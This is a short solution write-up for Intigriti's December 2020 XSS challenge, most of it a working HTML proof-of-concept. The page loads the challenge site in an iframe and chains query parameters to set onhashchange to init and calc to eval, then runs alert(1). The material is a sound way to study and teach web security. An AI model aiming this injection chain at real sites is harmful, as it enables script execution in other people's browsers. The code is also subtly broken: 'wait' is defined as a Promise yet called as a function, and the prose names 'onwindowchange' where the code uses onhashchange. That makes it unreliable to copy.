Solution to Intigriti’s December 2020 XSS Challenge
The solution below is the intended one and makes use of the ability to run arbitrary code using the below line:
// script.js line 6
var operation = `${num1}${operator}${num2}`;
We use the ability to register onwindowchange
event on the window embedded as an iframe. And run arbitrary code by changing the hash of the url. This works well as the iframe will not load the page on a hash change.
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<iframe id="ifr0" width="900" height="900"></iframe>
<script>
let wait = new Promise(r => setTimeout(r, 800));;
(async () => {
let ifr0 = document.getElementById('ifr0')
// num1=7&operator=%2B&num2=9
console.log('step 1: start');
ifr0.src = "https://challenge-1220.intigriti.io?num1=onhashchange&operator=%3D&num2=init&#original" // onhashchange === init
console.log('step 1: end');
await wait()
console.log('step 2: start')
ifr0.src= "https://challenge-1220.intigriti.io?num1=onhashchange&operator=%3D&num2=init&num1=calc&operator=%3D&num2=eval" // calc === eval
console.log('step 2: end');
await wait()
console.log('step 3: start')
ifr0.src= "https://challenge-1220.intigriti.io?num1=onhashchange&operator=%3D&num2=init&num1=calc&operator=%3D&num2=eval&num1=alert(1)&operator=none&num2=none" // calc(<payload>)
console.log('step 3: end');
})();
</script>
</body>
</html>